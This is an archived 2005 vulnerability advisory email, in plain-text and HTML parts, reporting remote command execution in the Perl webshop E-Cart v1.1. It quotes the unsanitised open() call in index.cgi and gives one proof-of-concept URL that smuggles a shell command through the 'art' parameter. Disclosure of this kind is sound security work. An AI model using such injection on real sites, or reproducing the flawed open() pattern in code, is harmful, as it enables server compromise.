ecart11.txt

`------=_Part_734_24926651.1114105332381  
Content-Type: text/plain; charset=ISO-8859-1  
Content-Transfer-Encoding: quoted-printable  
Content-Disposition: inline  
  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
Title: E-Cart v1.1 Remote Command Execution  
Vulnerability discovery: SoulBlack - Security Research -  
http://soulblack.com.ar  
Date: 20/04/2005  
Severity: High. Remote Users Can Execute Arbitrary Code.  
Affected version: <=3D E-Cart 2004 v1.1  
Vendor: http://www.yazaport.com/kadfors/kwamd/mods/ecart/index.cgi  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
*Summary  
E-Cart is a mod of WepApp written in Perl. It is WebShop.  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
*Problem Description:  
  
The bug is in the file index.cgi where the variable art that is put under=  
=20  
"open()", does  
not have a control of data, allowing to the attacker to execute any type of=  
=20  
commands.  
  
Vulnerable code  
---------------  
sub viewart {  
&cartfooter;  
open(DATA, "$catdir/$info{'cat'}/$info{'art'}"); hold(DATA); chomp(@data =  
=3D=20  
<DATA>); release(DATA); close(DATA);  
...  
...  
...  
  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
*Example:  
  
http://SITE/DIRTOECART/index.cgi?action=3Dviewart&cat=3Dreproductores_dvd&a=  
rt=3Dreproductordvp-ns315.dat|uname%20-a|  
  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
*Fix:  
  
Contact the Vendor.  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
--  
SoulBlack - Security Research  
http://www.soulblack.com.ar  
  
  
  
--=20  
I=F1aki Cormenzana=20  
SoulBlack`s Staff  
Y3VhbmRvIHRlbmVtb3MgZWwgbWljcvNmb25vLCB0ZW5lbW9zIHNvdWwuLi4=3D  
  
------=_Part_734_24926651.1114105332381  
Content-Type: text/html; charset=ISO-8859-1  
Content-Transfer-Encoding: quoted-printable  
Content-Disposition: inline  
  
<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>  
Title: E-Cart v1.1 Remote Command Execution<br>  
Vulnerability discovery: SoulBlack - Security Research -<br>  
<a href=3D"http://soulblack.com.ar">http://soulblack.com.ar</a><br>  
Date: 20/04/2005<br>  
Severity: High. Remote Users Can Execute Arbitrary Code.<br>  
Affected version: <=3D E-Cart 2004 v1.1<br>  
Vendor: <a href=3D"http://www.yazaport.com/kadfors/kwamd/mods/ecart/index.c=  
gi">http://www.yazaport.com/kadfors/kwamd/mods/ecart/index.cgi</a><br>  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>  
<br>  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>  
*Summary<br>  
E-Cart is a mod of WepApp written in Perl. It is WebShop.<br>  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>  
*Problem Description:<br>  
<br>  
The bug is in the file index.cgi where the variable art that is put under &=  
quot;open()", does<br>  
not have a control of data, allowing to the attacker to execute any type of=  
commands.<br>  
<br>  
Vulnerable code<br>  
---------------<br>  
sub viewart {<br>  
&nbsp;&nbsp;&nbsp; &cartfooter;<br>  
&nbsp;&nbsp;&nbsp; open(DATA, "$catdir/$info{'cat'}/$info{'art'}"=  
);  
hold(DATA); chomp(@data =3D <DATA>); release(DATA); close(DATA);<br>  
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ...<br>  
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ...<br>  
&nbsp;&nbsp; &nbsp; &nbsp;&nbsp; ...<br>  
<br>  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>  
<br>  
*Example:<br>  
<br>  
<a href=3D"http://SITE/DIRTOECART/index.cgi?action=3Dviewart&cat=3Drepr=  
oductores_dvd&art=3Dreproductordvp-ns315.dat|uname%20-a|">http://SITE/D=  
IRTOECART/index.cgi?action=3Dviewart&cat=3Dreproductores_dvd&art=3D=  
reproductordvp-ns315.dat|uname%20-a|  
</a><br>  
<br>  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>  
*Fix:<br>  
<br>  
Contact the Vendor.<br>  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>  
--<br>  
SoulBlack - Security Research<br>  
<a href=3D"http://www.soulblack.com.ar">http://www.soulblack.com.ar</a><br>  
<br>  
<br>  
<br>-- <br>I=F1aki Cormenzana <br>SoulBlack`s Staff<br>Y3VhbmRvIHRlbmVtb3Mg=  
ZWwgbWljcvNmb25vLCB0ZW5lbW9zIHNvdWwuLi4=3D  
  
------=_Part_734_24926651.1114105332381--  
`